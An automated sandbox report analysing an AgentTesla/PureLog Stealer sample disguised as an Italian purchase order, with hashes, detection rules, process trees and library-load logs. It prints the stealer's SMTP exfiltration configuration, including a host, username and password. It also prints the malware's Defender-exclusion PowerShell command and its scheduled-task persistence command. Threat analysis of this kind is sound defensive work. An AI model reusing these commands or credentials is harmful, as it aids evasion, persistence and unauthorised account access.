Windows Analysis Report
PUK ITALIA PO 120610549.EXE.exe

Overview

General Information

Sample name: PUK ITALIA PO 120610549.EXE.exe
Analysis ID: 1409106
MD5: 876bdd759d990110a2bbd617b0f2c549
SHA1: dec55c0273518038e0f2cdabe94d0d33e6fb1704
SHA256: 066beb79d6fc244e4fc3db3cae1af40749798a52f6b5796f14e3612e1498bf73
Tags: exe

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PUK ITALIA PO 120610549.EXE.exe (PID: 6104 cmdline: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe MD5: 876BDD759D990110A2BBD617B0F2C549)
    • powershell.exe (PID: 7284 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7508 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7324 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • FNOqSQ.exe (PID: 7584 cmdline: C:\Users\user\AppData\Roaming\FNOqSQ.exe MD5: 876BDD759D990110A2BBD617B0F2C549)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.alltoursegypt.com", "Username": "admin@alltoursegypt.com", "Password": "OPldome23#12klein"}
Source | Rule | Description | Author | Strings
00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (listed below)
  • 0x34edb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x34f4d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34fd7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x35069:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x350d3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x35145:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x351db:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3526b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings
7.2.FNOqSQ.exe.2c07308.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
7.2.FNOqSQ.exe.52b0000.12.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
7.2.FNOqSQ.exe.52b0000.12.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, ProcessId: 7284, ProcessName: powershell.exe
Source: Network Connection, Author: frack113: Data: DestinationIp: 192.254.186.165, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Initiated: true, ProcessId: 6104, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, ProcessId: 7324, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, ProcessId: 7284, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, ProcessId: 7324, ProcessName: schtasks.exe
No Snort rule has matched

AV Detection

Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.alltoursegypt.com", "Username": "admin@alltoursegypt.com", "Password": "OPldome23#12klein"}
Source: C:\Users\user\AppData\Roaming\FNOqSQ.exe, ReversingLabs: Detection: 65%
Source: PUK ITALIA PO 120610549.EXE.exe, ReversingLabs: Detection: 65%
Source: PUK ITALIA PO 120610549.EXE.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: PUK ITALIA PO 120610549.EXE.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RIoz.pdb source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr
Source: Binary string: RIoz.pdbSHA2563 source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr
Source: Joe Sandbox View, IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, DNS traffic detected: queries for: api.ipify.org
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown, Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, NmHr1WHWKO.cs, .Net Code: lhg
Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, NmHr1WHWKO.cs, .Net Code: lhg
Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, NmHr1WHWKO.cs, .Net Code: lhg
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe

System Summary

Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs PUK ITALIA PO 120610549.EXE.exe
Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename106790a0-b81d-4bde-9832-48ebd9bb7fec.exe4 vs PUK ITALIA PO 120610549.EXE.exe
Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilename106790a0-b81d-4bde-9832-48ebd9bb7fec.exe4 vs PUK ITALIA PO 120610549.EXE.exe
Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4120310835.000000000098E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs PUK ITALIA PO 120610549.EXE.exe
Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameWagon.dll> vs PUK ITALIA PO 120610549.EXE.exe
Source: PUK ITALIA PO 120610549.EXE.exe, Binary or memory string: OriginalFilenameRIoz.exe@ vs PUK ITALIA PO 120610549.EXE.exe
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Section loaded: version.dll
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: wldp.dllJump to behavior
